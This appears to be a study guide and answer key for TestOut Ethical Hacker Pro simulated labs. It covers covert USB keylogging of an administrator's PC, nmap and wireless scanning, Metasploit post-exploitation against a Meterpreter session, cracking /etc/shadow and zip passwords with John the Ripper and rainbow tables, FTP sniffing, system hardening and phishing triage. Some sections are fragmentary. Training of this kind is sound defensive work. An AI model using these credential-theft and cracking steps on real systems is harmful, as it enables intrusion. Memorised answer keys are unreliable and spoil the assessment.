TestOut Ethical Hacker Pro Domain Review

QUESTION 2: The CEO of CorpNet.xyz has hired your firm to obtain some passwords for their company. A senior IT network administrator, Oliver Lennon, is suspected of wrongdoing and suspects he is going to be fired from the company. The problem is that he changed many of the standard passwords known to only the top executives, and now he is the only one that knows them. Your company has completed the legal documents needed to protect you and the company. With the help of a CorpNet.xyz executive, you were allowed into the IT Admin's office after hours. You unplugged the keyboard from the back of the ITAdmin computer and placed a USB keylogger into the USB, then plugged the USB keyboard into the keylogger. After a week, the company executive lets you back into the IT Admin's office after hours again. In this lab, your task is to use the keylogger to recover the changed passwords as follows: • Move the keyboard USB connector to a different USB port on ITAdmin. • Remove the keylogger from ITAdmin. • Move the consultant laptop from the Shelf to the Workspace. • Plug the keylogger into the consultant laptop's USB drive. • Use the SBK key combination to toggle the USB keylogger from keylogger mode to USB flash drive mode. • Open the LOG.txt file and inspect the contents. • Find the olennon account's password. • Find the Administrator account's password. • Answer the questions. Your Performance Your Score: 4 of 4 (100%)

Task Summary Required Actions & Questions Used WhoIs.org to discover name servers Q1 Which of the following Name Servers are being used by CorpNet.xyz? Used nslookup to discover www.corpnet.xyz IP address Q2 What is the IP address for CorpNet.xyz? Used nmap to discover open ports for ftp and telnet Q3 Which of the following servers use the potentially vulnerable ftp and telnet ports? Explanation In this lab, your task is to perform reconnaissance on www.corpnet.xyz and to find potentially vulnerable ports on the servers in the CorpNet networks as follows: • On Consult-Lap, use the Whois.org site to determine the domain name servers used by www.corpnet.xyz. • On Consult-Lap, use nslookup to determine the primary web server address. • On Consult-Lap2, use Zenmap to perform an nmap search for open ports for the 198.28.1.0/24 network. • Answer the questions. Complete this lab as follows: 1. Find the name servers used by www.corpnet.xyz as follows: a. From the taskbar, open Chrome. b. In the URL field, type whois.org and press Enter . c. In the Search for a domain name filed, enter www.corpnet.xyz . d. Select Search . e. In the top right, select Answer Questions . f. Answer question 1. 2. Find the IP address used by www.corpnet.xyz as follows: a. Right-click Start and select Windows PowerShell (Admin) . b. At the prompt, type nslookup www.corpnet.xyz ns1.nethost.net and press Enter . c. Answer question 2. d. Minimize the question dialog. 3. Use Zenmap to run an nmap command to scan for open ports as follows: a. From the navigation tabs, select Buildings . b. Under Red Cell, select Consult-Lap2 . c. From the Favorites bar, open Zenmap. d. Maximize Zenmap for easier viewing. e. In the Command field type nmap -p- 198.28.1.0/24 . f. Select Scan to scan for open ports on all servers located on this network. g. In the top right, select Answer Questions . h. Answer question 3. i. Select Score Lab .

o Subnet mask: Class C • Answer the questions. Complete the following: 1. From the Favorites bar, open Zenmap. 2. At the prompt, type nmap 73.44.216.0/24 . 3. Select Scan . 4. Find the network vulnerabilities in the output. 5. In the top right, select Answer Questions . 6. Answer the questions. 7. Select Score Lab . Lab Questions: 1. Do your friend’s public -facing servers have any obvious security vulnerabilities? a. Yes 2. Which service vulnerability should be remediated first? a. Telnet QUESTION 6: You are the IT security administrator for a small corporate network. To protect your Bluetooth devices from hackers, you need to discover which Bluetooth devices are running in your company and gather information on each. In this lab, your task is to scan for Bluetooth devices using Terminal as follows: • Use hciconfig to discover and enable the onboard Bluetooth adapter. • Use hcitool to scan for Bluetooth devices and find the class ID. • Use l2ping to determine if the Bluetooth device is alive and within range. • Use sdptool to query Philip's Dell Laptop to determine the Bluetooth services available on the device.

Scan for wireless access points Q1 What is most likely the ESSID of the rogue access point? Q2 What is the signal power of the rogue access point? Q3 What is the frequency channel used by the rogue access point? Explanation In this lab, your task is to scan for rogue wireless access points using Terminal as follows: • Use airmon-ng to discover and enable the onboard wireless adapter. • Use airodump-ng to scan for wireless access points. • Answer the questions. Complete this lab as follows: 1. From the Favorites bar, open Terminal. 2. At the prompt, type airmon-ng and press Enter to view and find the name of the wireless adapter. 3. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode. 4. Type airmon-ng and press Enter to view the new name of the wireless adapter. 5. Type airodump-ng wlp1s0mon and press Enter to scan for wireless access points. 6. After a few seconds, press Ctrl + c to stop the scan. 7. In the top right, select Answer Questions . 8. Answer the questions. 9. Select Score Lab . Lab Questions: 1. What is most likely to be the rogue access point ESSID? a. CoffeeShop 2. What is the rogue access point’s signal power? a. -90 3. What frequency channel is the rogue access point using? a. 11 QUESTION 8:

You are the IT security administrator for a small corporate network. You're scanning your local network to determine potential vulnerabilities. In this lab, your task is to complete the following: • Use Zenmap to determine the operating system of the hosts on your network. • On ITAdmin, use net view to check for shared folders on CorpFiles12 and CorpFiles16. • Map the H: drive to the Confidential folder on CorpFiles16. • View the files in the Employee Records folder. • Answer the questions. Your Performance Your Score: 6 of 6 (100%) Pass Status: Pass Elapsed Time: 5 minutes 30 seconds Required Score: 100% Task Summary Required Actions & Questions Use nmap -O 192.168.0.0/24 to scan for operating systems on the local network Q1 Which computers on the network have a Linux operating system? Use net view to check the shared folders on CorpFiles12 Use net view to check the shared folders on CorpFiles16 Use net use to map a drive to the confidential folder on CorpFiles16 Q2 Which employee records are found on the open share? Explanation In this lab, your task is to complete the following: • Use Zenmap to determine the operating system of the hosts on your network. • On ITAdmin, use net view to check for shared folders on CorpFiles12 and CorpFiles16. • Map the H: drive to the Confidential folder on CorpFiles16. • View the files in the Employee Records folder. • Answer the questions.

1. From the Favorites bar, open Terminal. 2. At the prompt, type nmap -p- 198.28.1.0/24 and press Enter to scan for open ports on all servers located on this network. 3. Type nmap -p- 192.168.0.0/24 and press Enter to scan for open ports on all the servers located on this network. 4. In the top right, select Answer Questions . 5. Answer the questions. 6. Select Score Lab . Lab Questions: 1. Which networks contain open ports? a. 192.168.0.0 2. Which of the following servers have vulnerable open ports? (Select all that apply.) a. 192.168.0.8 b. 192.168.0.10 c. 192.168.0.11 d. 192.168.0.14 QUESTION 11: You work for a penetration testing consulting company. During an internal penetration test, you find that VNC is being used on the network, which violates your company's security policies. It was installed to maintain access by a malicious employee. In this lab, your task is to complete the following: • From the IT-Laptop, use Zenmap to scan all computers on the network to see if any devices have port 5900 (VNC) open. • Answer Question 1. • Go to the suspect computer and uninstall VNC. • From the suspect computer, run netstat to verify the ports for VNC are closed. IP Address Computer

QUESTION 12: You are the IT security administrator for a small corporate network. You are performing vulnerability scans on your network. Use the Security Evaluator tool to run a vulnerability scan on the CorpDC domain controller. In this lab, your task is to: • Run a vulnerability scan for the CorpDC domain controller using the Security Evaluator on the taskbar. • Remediate the vulnerabilities in the Default Domain Policy using Group Policy Management on CorpDC. • Re-run a vulnerability scan to make sure all of the issues are resolved. Your Performance Your Score: 7 of 7 (100%) Pass Status: Pass Elapsed Time: 11 minutes 9 seconds Required Score: 100% Task Summary Required Actions Reset account lockout counter after 60 minutes Use a minimum password length of 14 characters Use a minimum password age of 1 day Enforce password history for 24 passwords Event log retention set not to overwrite events Hide Details Application log Security log System log DCOM Server Process Launcher service disabled Task Scheduler service disabled

Explanation In this lab, your task is to: • Run a vulnerability scan for the CorpDC domain controller using the Security Evaluator on the taskbar. • Remediate the vulnerabilities in the Default Domain Policy using Group Policy Management on CorpDC. Policy Setting Account Lockout: Reset account lockout counter after 60 Minutes Password Policy: Minimum password length 14 Characters Password Policy: Minimum password age 1 Day Password Policy: Enforce password history 24 Passwords Event Log: Retention method for application log Do not overwrite events (clear log manually) Event Log: Retention method for security log Do not overwrite events (clear log manually) Event Log: Retention method for system log Do not overwrite events (clear log manually) System Services: DCOM Server Process Launcher Disabled System Services: Task Scheduler Disabled • Re-run a vulnerability scan to make sure all of the issues are resolved. Complete this lab as follows: 1. Run a Security Evaluator report as follows: a. From the taskbar, open Security Evaluator. b. Next to Local Machine, select the Target icon to select a new target. c. Select Domain Controller . d. From the Domain Controller drop-down list, select CorpDC as the target.

e. Click OK . f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results to determine which issues you need to resolve on CorpDC. 2. From the top navigation tabs, select Floor 1 . 3. Under Networking Closet, select CorpDC . 4. Remediate password issues in Account Policies as follows: a. From Server Manager, select Tools > Group Policy Management . b. Maximize the window for easier viewing. c. Expand Forest: CorpNet.local . d. Expand Domains . e. Expand CorpNet.local . f. Right-click Default Domain Policy and select Edit . g. Maximize the window for easier viewing. h. Under Computer Configuration, expand Policies . i. Expand Windows Settings . j. Expand Security Settings . k. Expand Account Policies . l. Select Account Lockout Policy . m. In the right pane, right-click the policy and select Properties . n. Select Define this policy setting . o. Enter 60 minutes and then click OK . p. In the left pane, select Password Policy . q. In the right pane, right-click the policy and select Properties . r. Select Define this policy setting . s. Enter the password setting and then click OK . t. Repeat steps 4q – 4s for each additional Password policy. 5. Remediate Event Log issues as follows: a. In the left pane, select Event Log . b. In the right pane, right-click the policy and select Properties . c. Select Define this policy setting . d. Enter the password setting and then select OK . e. Repeat steps 5b – 5d for each additional Event Log policy. 6. Remediate System Services issues as follows: a. In the left pane, select System Services . b. In the right pane, right-click the policy and select Properties . c. Select Define this policy setting . d. Make sure Disabled is selected and then click OK . e. Repeat steps 6b – 6d for each additional System Services policy. 7. Verify that all the issues were resolved using the Security Evaluator feature on the ITAdmin computer as follows: a. From the top navigation tabs, select Floor 1 . b. Select ITAdmin . c. In Security Evaluator, select Status Run/Rerun Security Evaluation icon to rerun the security evaluation. d. If you still see unresolved issues, select Floor 1 , navigate to CorpDC , and remediate any remaining issues.

QUESTION 13: You are the IT security administrator for a small corporate network. You need to use a vulnerability scanner to check for security issues on your Linux computers. In this lab, your task is to: • Use the Security Evaluator to check the security: o On the Linux computer with the 192.168.0.45 IP address. o On the Linux computers in the IP address range of 192.168.0.60 through 192.168.0.69

• Answer the questions. Your Performance Your Score: 5 of 5 (100%) Pass Status: Pass Elapsed Time: 12 minutes 57 seconds Required Score: 100% Task Summary Required Actions & Questions Run a Security Evaluator report for 192.168.0.45 Q1 For the Linux computer with the 192.168.0.45 address, which security vulnerability passed? Run a Security Evaluator report for IP address range of 192.168.0.60-192.168.0.69 Q2 Which IP addresses in the 192.168.0.60 through 192.168.0.69 range had issues that need to be resolved? Q3 For the Linux computer with the 192.168.0.65 address, what is the name of the vulnerability that only has a warning? Explanation In this lab, your task is to: • Use the Security Evaluator to check the security: o On the Linux computer with the 192.168.0.45 IP address. o On the Linux computers in the IP address range of 192.168.0.60 through 192.168.0.69 • Answer the questions. Complete this lab as follows: 1. Run a Security Evaluator report for 192.168.0.45 as follows: a. From the taskbar, open Security Evaluator. b. Next to Local Machine, select the Target icon to select a new target. c. Select IPv4 Address . d. Enter 192.168.0.45 e. Click OK . f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results. h. In the top right, select Answer Questions . i. Answer question 1.

2. Run a Security Evaluator report for the IP address range of 192.168.0.60 through 192.168.0.69 as follows: a. In Security Evaluator, select the Target icon to select a new target. b. Select IPv4 Range . c. In the left field, type: 192.168.0.60 d. In the right field, type: 192.168.0.69 e. Click OK . f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results. h. Answer questions 2 and 3. i. Select Score Lab . Lab Questions: 1. For the Linux computer with the 192.168.0.45 address, which security vulnerability? a. Root – Password Does Not Expire 2. Which IP addresses in the 192.168.0.60 through 192.168.0.69 range has issues that need to be resolved? (Select all that apply.) a. 192.168.0.65 b. 192.168.0.68 3. For the Linux computer with the 192.168.0.45 address, what is the name of the vulnerability that only had a warning? a. Backup – Password Does Not Expire QUESTION 14: You are the IT security administrator for a small corporate network. You perform regular vulnerability scans on your network. Recently, you added a new network security appliance (NSA) to the network. You used the ITAdmin workstation when you configured the NSA. In this lab, your task is to: • Run a vulnerability scan for the network security appliance (NSA) (198.28.56.18) using Security Evaluator on the taskbar.

• Remediate the vulnerabilities found in the vulnerability report on the NSA. o Rename the cisco user account using the following parameters: ▪ Set a username of your choice . ▪ Set a password of your choice . ▪ Set the idle timeout to 15 minutes or less . ▪ Set LAN access only for your user (no WAN access). ▪ Allow access to your user only from the ITAdmin workstation (192.168.0.31). • Re-run a vulnerability scan to make sure all of the issues are resolved. “ Access the NSA management console through Google Chrome on http://198.28.56.18 using the username cisco and the password cisco . ” Your Performance Your Score: 5 of 5 (100%) Pass Status: Pass Elapsed Time: 10 minutes 43 seconds Required Score: 100% Task Summary Required Actions Change the default Admin username Change the default Admin password Change the idle timeout for the Admin user to 15 minutes or less Limit administrative access for the Admin user to WAN only Limit administrative access for the Admin user to only the ITAdmin computer Explanation In this lab, your task is to:

• Run a vulnerability scan for the network security appliance (NSA) (198.28.56.18) using Security Evaluator on the taskbar. • Remediate the vulnerabilities found in the vulnerability report on the NSA. o Rename the cisco user account using the following parameters: ▪ Set a username of your choice . ▪ Set a password of your choice . ▪ Set the idle timeout to 15 minutes or less . ▪ Set LAN access only for your user (no WAN access). ▪ Allow access to your user only from the ITAdmin workstation (192.168.0.31). • Re-run a vulnerability scan to make sure all of the issues are resolved. Complete this lab as follows: 1. Run a Security Evaluator report as follows: a. From the taskbar, open Security Evaluator. b. Next to Local Machine, select the Target icon to select a new target. c. Select IPv4 Address . d. Enter 198.28.56.18 . e. Click OK . f. Select the Status Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results to determine which issues you need to resolve on the NSA. 2. From the taskbar, open Chrome. 3. Maximize Chrome for easier viewing. 4. In the URL field, type 198.28.56.18 and press Enter . 5. In the Security Appliance Configuration utility, enter cisco as the username. 6. Enter cisco as the password. 7. Select Log In . 8. Rename the cisco user account as follows: a. From the Getting Started (Basic) page, select Change Default Admin Password and Add Users . b. Select Edit for the cisco username. c. In the User Name field, enter the username you chose. d. Select Check to Edit Password . e. In the Enter Current Logged in Administrator Password field, enter cisco . f. In the New Password field, enter the password you choose. g. In the Confirm New Password field, enter the password to confirm the new password. h. Enter the idle timeout . i. Click Apply . 9. Edit user policies as follows: a. Under Edit User Policies, select Login to configure a login policy. b. Select Deny Login from WAN Interface . c. Click Apply . 10. Define network access as follows:

a. Under Edit User Policies, select By IP to configure IP address restrictions for login. b. Under Defined Addresses, select Add . c. In the Source Address Type field, make sure IP Address is selected. d. In the Network Address/IP Address field, enter 192.168.0.31 for ITAdmin. e. Click Apply . f. Select Allow Login only from Defined Addresses . g. Click Apply to close the dialog. 11. Verify that all the issues were resolved using the Security Evaluator feature on the ITAdmin computer as follows: a. From the taskbar, open Security Evaluator. b. In Security Evaluator, select Status Run/Rerun Security Evaluation icon to rerun the security evaluation. c. Remediate any remaining issues. QUESTION 15:

You are the IT security administrator for a small corporate network. You are performing vulnerability scans on your network. Mary is the primary administrator for the network and the only person authorized to perform local administrative actions. The company network security policy requires complex passwords for all users. It is also required that Windows Firewall is enabled on all workstations. Sharing personal files is not allowed. In this lab, your task is to: • Run a vulnerability scan for the Office2 workstation using the Security Evaluator on the taskbar. • Remediate the vulnerabilities found in the vulnerability report on Office2 as follows: o Rename the Administrator account. o Disable the Guest account. o Set the password for the Mary account to expire. o Require a strong password for the Mary account. o Unlock the Susan account. o Remove the Susan account from the Administrators group. o Turn on Windows Firewall for all profiles. o Remove the file share on the MyMusic folder. • Re-run a vulnerability scan to make sure all of the issues are resolved. Your Performance Your Score: 6 of 6 (100%) Pass Status: Pass Elapsed Time: 6 minutes 49 seconds Required Score: 100% Task Summary Required Actions Remediate the Administrator account Disable the Guest account Remediate the Mary account Hide Details

Set a strong password (12 characters or more) for the Mary account Remove Password Never Expires from the Mary account Remediate the Susan account Hide Details Unlock the Susan account Remove Susan from the Administrators group Turn on the Windows Firewall feature for all profiles Remove the C:\\MyMusic folder share Explanation In this lab, your task is to: • Run a vulnerability scan for the Office2 workstation using the Security Evaluator on the taskbar. • Remediate the vulnerabilities found in the vulnerability report on Office2 as follows: o Rename the Administrator account. o Disable the Guest account. o Set the password for the Mary account to expire. o Require a strong password for the Mary account. o Unlock the Susan account. o Remove the Susan account from the Administrators group. o Turn on Windows Firewall for all profiles. o Remove the file share on the MyMusic folder. • Re-run a vulnerability scan to make sure all of the issues are resolved. Complete this lab as follows: 1. Run a Security Evaluator report as follows: a. From the taskbar, open Security Evaluator. b. Next to Local Machine, select the Target icon to select a new target. c. Select Workstation . d. From the Workstation drop-down list, select Office2 as the target. e. Click OK . f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results to determine which issues you need to resolve on Office2. 2. From the top navigation tabs, select Floor 1 . 3. Under Office 2, select Office2 . 4. On Office2, right-click Start and select Computer Management . 5. Expand Local Users and Groups . 6. Select Users . 7. Rename a user account as follows: a. Right-click Administrator and select Rename . b. Enter a new name and press Enter . 8. Disable the Guest account as follows: a. Right-click Guest and select Properties .

b. Select Account is disabled and then click OK . 9. Set a new password as follows: a. Right-click Mary and select Set Password . b. Select Proceed . c. Enter a new password (12 characters or more). d. Confirm the new password and then click OK . e. Click OK . Ideally, you should have created a policy that requires passwords with 12 characters or more. 10. Set a password to expire as follows: a. Right-click Mary and select Properties . b. Deselect Password never expires . c. Select User must change password at next logon and then click OK . 11. Unlock a user account and remove the user from a group as follows: a. Right-click Susan and select Properties . b. Deselect Account is locked out and then click Apply . c. Select the Member of tab. d. Select the Administrators . e. Select Remove . f. Click OK . g. Close Computer Management. 12. Enable Windows Firewall for all profiles as follows: a. In the search field on the taskbar, enter Control Panel . b. Under Best match, select Control Panel . c. Select System and Security . d. Select Windows Firewall . e. Select Turn Windows Firewall on or off . f. Under Domain network settings, select Turn on Windows Firewall . g. Under Private network settings, select Turn on Windows Firewall . h. Under Public network settings, select Turn on Windows Firewall . i. Click OK . j. Close Windows Firewall. 13. Remove a file share as follows: a. From the taskbar, open File Explorer. b. Browse to C:\\MyMusic . c. Right-click MyMusic and select Properties . d. Select the Sharing tab. e. Select Advanced Sharing . f. Deselect Share this folder . g. Click OK . h. Click OK . 14. Use the Security Evaluator feature to verify that all of the issues on the ITAdmin computer were resolved as follows: a. From the top navigation tabs, select Floor 1 . b. Select ITAdmin .

c. In Security Evaluator, select Status refresh to rerun the security evaluation. d. If you still see unresolved issues, select Floor 1 , navigate to the Office2 workstation, and remediate any remaining issues. QUESTION 16: You are the IT security administrator for a small corporate network. You perform vulnerability scans on your network. You need to verify the security of your wireless network and your Ruckus wireless access controller.

In this lab, your task is to: • Run a vulnerability scan for the wireless access controller (192.168.0.6) using Security Evaluator on the taskbar. • Remediate the vulnerabilities found in the vulnerability report for the wireless access controller. o New Admin name: your choice o New password: your choice o Enable reporting of rogue devices for intrusion prevention. • Rerun a vulnerability scan to make sure all of the issues are resolved. “ Access the wireless controller console through Google Chrome on http://192.168.0.6 with the admin name admin and the password password . ” Your Performance Your Score: 2 of 2 (100%) Pass Status: Pass Elapsed Time: 4 minutes 53 seconds Required Score: 100% Task Summary Required Actions Change the default Admin username and password Enable Intrusion Detection Explanation In this lab, your task is to: • Run a vulnerability scan for the wireless access controller (192.168.0.6) using Security Evaluator on the taskbar. • Remediate the vulnerabilities found in the vulnerability report for the wireless access controller. o New Admin name: your choice o New password: your choice o Enable reporting of rogue devices for intrusion prevention. • Re-run a vulnerability scan to make sure all of the issues are resolved.

Complete this lab as follows: 1. Run a Security Evaluator report as follows: a. From the taskbar, open Security Evaluator. b. Next to Local Machine, select the Target icon to select a new target. c. Select IPv4 Address . d. Enter 192.168.0.6 for the wireless access controller. e. Click OK . f. Select the Status Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results to determine which issues you need to resolve on the wireless access controller. 2. Change the admin username and password as follows: a. From the taskbar, open Chrome . b. Maximize Chrome for easier viewing. c. Type 192.168.0.6 and press Enter . d. Enter the admin name . e. Enter the password . f. Select Login . g. From the top, select the Administer tab. h. Make sure Authenticate using the admin name and password is selected. i. In the Admin Name field, enter the username you chose. j. In the Current Password field, enter the password . k. In the New Password field, enter the password you chose. l. In the Confirm New Password field, enter the new password . m. On the right, select Apply . 3. Enable intrusion prevention as follows: a. Select the Configure tab. b. On the left, select WIPS . c. Under Intrusion Detection and Prevention, select Enable report rogue devices . d. On the right, select Apply . 4. Verify that all the issues were resolved using the Security Evaluator feature on the ITAdmin computer as follows: a. From the taskbar, open Security Evaluator. b. In Security Evaluator, select Status Run/Rerun Security Evaluation icon to rerun the security evaluation. c. Remediate any remaining issues.

QUESTION 17: You are an ethical hacker consultant working for CorpNet. CorpNet wants you to discover weaknesses in their public-facing servers. From outside of the CorpNet network, you are able to deploy a Metasploit payload to one of their Windows servers named www3.corpnet.xyz. You are determining whether the Windows patches are up to date or if there is an unpatched vulnerability that could be exploited. In this lab, your task is to: • Use the post/windows/gather/enum_patches exploit in Metasploit to enumerate the Windows patches that are missing or vulnerable. • Answer the question. “ Metasploit has already been configured to exploit the payload that was deployed to www3.corpnet.xyz. This Meterpreter payload has already connected as session 1. ” Your Performance Your Score: 2 of 2 (100%) Pass Status: Pass

Elapsed Time: 4 minutes 14 seconds Required Score: 100% Task Summary Lab Questions Configure and run the enum_patches exploit Q1 Which Windows patches are missing? Explanation In this lab, your task is to • Use the post/windows/gather/enum_patches exploit in Metasploit to enumerate the Windows patches that are missing or vulnerable. • Answer the question. Complete this lab as follows: 1. From the Favorites bar, open Metasploit Framework. 2. At the prompt, type use post/windows/gather/enum_patches and press Enter to use the enumerate patches exploit. 3. Type show options and press Enter to show the exploit options. Notice that the session option is absent. 4. Type set session 1 and press Enter to specify the session. 5. Type show options and press Enter . Notice that the session option has been set. 6. Type run and press Enter to begin the exploit. 7. In the top right, select Answer Questions . 8. Answer the question. 9. Select Score Lab . Lab Questions: 1. Which Windows patches are missing? a. KB2871997 b. KB2928120

QUESTION 18: You are an ethical hacker consultant working for CorpNet. CorpNet wants you to discover weaknesses in their public-facing servers. From outside of the CorpNet network, you have discovered one of their Windows servers named www3.corpnet.xyz with an IP address of 198.28.1.3. You believe a Microsoft SQL server is installed on this server, but it doesn't respond to the default TCP port of 1433. In this lab, your task is to use the auxiliary/scanner/mssql/mssql_ping exploit in Metasploit to determine which TCP port Microsoft SQL is using. Your Performance Your Score: 2 of 2 (100%) Pass Status: Pass Elapsed Time: 1 minute 57 seconds Required Score: 100% Task Summary Lab Questions Configure and run the auxiliary/scanner/mssql/mssql_ping exploit Q1 Which port is the Microsoft SQL Server using on www3.corpnet.xyz? Explanation In this lab, your task is to use the auxiliary/scanner/mssql/mssql_ping exploit in Metasploit to determine which TCP port Microsoft SQL is using. Complete this lab as follows: 1. From the Favorites bar, open Metasploit Framework. 2. At the prompt, type use auxiliary/scanner/mssql/mssql_ping and press Enter to use the MSSQL Ping Utility exploit. 3. Type show options and press Enter to show the exploit options. Notice that the RHOSTS setting is absent. 4. Type set RHOSTS 198.28.1.3 and press Enter to specify the remote host. 5. Type show options and press Enter to show the exploit options. Notice that RHOSTS has been set. 6. Type exploit and press Enter to begin the exploit.

7. In the top right, select Answer Questions . 8. Answer the question. 9. Select Score Lab . Lab Questions: 1. Which port is the Microsoft SQL Server using on www3.corpnet.xyz? a. 1511 A.2.2 Pro Domain 2: Gain Access QUESTION 1: You are the IT security administrator for a small corporate network. You've received a zip file that contains sensitive password-protected files. You need to access these files. The zip file is located in the home directory. In this lab, your task is to use John the Ripper to: • Crack the root password on Support. • Crack the password of the protected.zip file in the home directory on IT-Laptop. “After John the Ripper cracks the password, it won’t crack it again. The results are stored in the john.pot file. ”

Your Performance Your Score: 4 of 4 (100%) Pass Status: Pass Elapsed Time: 7 minutes 7 seconds Required Score: 100% Task Summary Required Actions & Questions Crack the password to the Linux computer Q1 What is the password for the Linux computer? Crack the password to the zip file Q2 What is the password for the rotected.zip file? Explanation In this lab, your task is to use John the Ripper to: • Crack the root password on Support. • Crack the password of the protected.zip file in the home directory on IT-Laptop. Complete this lab as follows: 1. Crack the root password on Support as follows: a. From the Favorites bar, open Terminal. b. At the prompt, type cd /usr/share/john and press Enter to change directories to the folder containing the John the Ripper password file. c. Type ls and press Enter to list the files in the directory. d. Type cat password.lst and press Enter to view the password list. This is an abbreviated list. e. Type cd and press Enter to go back to root. f. Type john /etc/shadow and press Enter to crack the Linux passwords. Notice that the root password of 1worm4b8 was cracked. g. Type john /etc/shadow and press Enter to attempt to crack the Linux passwords again. Notice that it does not attempt to crack the password again. The cracked password is already stored in the john.pot file. h. Type cat ./.john/john.pot and press Enter to view the contents of the john.pot file. i. Type john /etc/shadow --show and press Enter as an alternate method of viewing the previously cracked password. j. In the top right, select Answer Questions . k. In Terminal, find the root password and answer the question. 2. Crack the password of the protected.zip file as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under IT Administration, select IT-Laptop .

c. From the Favorites bar, open Terminal. d. At the prompt, type ls and press Enter to view the contents of the home directory. Notice the protected.zip file you wish to crack. e. Type zip2john protected.zip > ziphash.txt and press Enter to copy the hashes to a text file. f. Type cat ziphash.txt and press Enter to confirm that the hashes have been copied. g. Type john --format=pkzip ziphash.txt and press Enter to crack the password. Notice that the password of p@ssw0rd was cracked. h. Type john ziphash.txt --show and press Enter to show the password. i. In the top right, select Answer Questions . j. In Terminal, find the password for the file and answer the question. k. Select Score Lab . Lab Questions: 1. 1worm4b8 2. p@ssw0rd QUESTION 2: While doing some penetration testing for your company, you captured some password hashes. The password hashes are saved in the root user's home directory /root/captured_hashes.txt. Now you want to hack these passwords using a rainbow table. The password requirements for your company are as follows: • The password must be 20 or more characters in length. • The password must include at least one upper and one lowercase letter. • The password must have at least one of these special characters: ! " # $ % & _ ' * @ • All passwords are encrypted using a hash algorithm of either md5 or sha1. In this lab, your task is to:

• Create md5 and sha1 rainbow tables using rtgen. • Sort the rainbow tables using rtsort. • Crack the hashes using rcrack. You must run rcrack on one individual hash and run it on the hash file. • Answer the question. “ The type of charset that can be used to create a rainbow table is stored in the /usr/share/rainbowcrack/charset.txt file. This file can be viewed using the cat command. ” Your Performance Your Score: 7 of 7 (100%) Pass Status: Pass Elapsed Time: 6 minutes 37 seconds Required Score: 100% Task Summary Required Actions & Questions Create rainbow tables Hide Details rtgen md5 ascii-32xx rtgen sha1 ascii-32xx Sort the rainbow tables using rtsort Crack the hash using rcrack . -l Crack the hash using rcrack . -h Q1 What is the password for hash 202cb962ac59075b964b07152d234b70? Q2 What is the password for hash 400238780e6c41f8f790161e6ed4df3b? Q3 What is the password for hash 89BF04763BF91C9EE2DDBE23D7B5C730BDD41FF2? Explanation In this lab, your task is to: • Create md5 and sha1 rainbow tables using rtgen. • Sort the rainbow tables using rtsort. • Cracked the hashes using rcrack. You must run rcrack on one individual hash as well as running it on the hash file. • Answer the questions.

Complete this lab as follows: 1. From the Favorites bar, open Terminal. 2. At the prompt, type rtgen md5 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a md5 rainbow crack table. 3. Type rtgen sha1 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a sha1 rainbow crack table. 4. Type rtsort . and press Enter to sort the rainbow table. 5. Type rcrack . -l /root/captured_hashes.txt and press Enter to crack the password contained in a hash file. 6. Type rcrack . -h hash_value and press Enter to crack the password contained in a hash. 7. In the top right, select Answer Questions . 8. Answer the questions. 9. Select Score Lab . Lab Questions: 1. 123 2. MaryHad_A_Sm@ll_Lamb 3. DisneyL@nd3 QUESTION 3: You are the cypersecurity specialist for your company. You are conducting a penetration test to see if anyone is using FTP against company policy. In this lab, your task is to capture FTP packets as follows: • Use Wireshark to capture packets for five seconds. • Filter for FTP packets. • Answer the questions. Your Performance Your Score: 3 of 3 (100%) Pass Status:

Pass Elapsed Time: 6 minutes 9 seconds Required Score: 100% Task Summary Lab Questions Q1 What is the name used to log into the FTP session? Q2 What is the password used to log into the FTP site? Q3 What is the name of the file downloaded during the FTP session? Explanation In this lab, your task is to capture FTP packets as follows: • Use Wireshark to capture packets for five seconds. • Filter for FTP packets. • Answer the questions. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0 . 3. Select the blue fin to begin a Wireshark capture. 4. Capture packets for five seconds. 5. Select the red box to stop the Wireshark capture. 6. In the Apply a display filter field, type ftp and press Enter . 7. In the top right, select Answer Questions . 8. Answer the questions. 9. Select Score Lab . Lab Questions: 3. What is the name used to log into the FTP session? a. Admin 4. What is the password used to log into the FTP site? a. P@ssword 5. What is the name of the file downloaded during the FTP session? a. Usage.txt

QUESTION 4: You work as the IT security administrator for a small corporate network. The company president has received several emails that he is wary of. He has asked you to determine whether they are hazardous and handle them accordingly. In this lab, your task is to: • Read each email and determine whether it is legitimate. • Delete any emails that are attempts at social engineering. • Keep any emails that are safe. “ Hold your mouse over the embedded links to see the actual URL in the status bar at the bottom of the screen. ” Your Performance Your Score: 8 of 8 (100%) Pass Status: Pass Elapsed Time: 1 minute 40 seconds Required Score: 100% Task Summary Required Actions Delete the Microsoft Windows Update Center phishing email Delete the Online Banking phishing email Delete the Grandma Jacklin forwarded email hoax Delete the Emily Smith spear phishing email Delete the Sara Goodwin malicious attachment email Delete the Grandma Jacklin forwarded email hoax Delete the Joe Davis malicious attachment email Delete the Executive Recruiting whaling email Explanation In this lab, delete each malicious email.

Email Diagnosis Action Description Microsoft Windows Update Center New Service Pack Phishing Delete Notice the various spelling errors and that the link does not direct you to a Microsoft website. Joe Davis Re: Lunch Today? Malicious Attachment Delete This email appears to be from a colleague. However, why would he fail to respond to your lunch question and send you a random attachment in return? Executive Recruiting Executive Jobs Whaling Delete Whaling uses tailored information to attack executives. Clicking the link could install malware that would capture sensitive company information. Human Resources Ethics Video Safe Keep While this email has an embedded link, it is digitally signed, so you know it actually comes from your Human Resources department. In addition, if you hover over the link, you see that it is a secure link to the corporate web server. Online Banking Department Payment Pending Phishing Delete This is a carefully crafted attempt to get your bank account information. Hover over the link and notice that it does not direct you to your credit union website, but to an unknown IP address instead. Grandma Jacklin FW: FW: FW: Virus Attack Warning Hoax Delete Any email that asks you to forward it to everyone you know is probably a hoax. Emily Smith Web Site Update Spear Phishing Delete While this email appears to come from a colleague, notice that the link points to an executable file from a Russian domain name. This probably is not a message a real colleague would send. This file will likely infect the computer with malware.

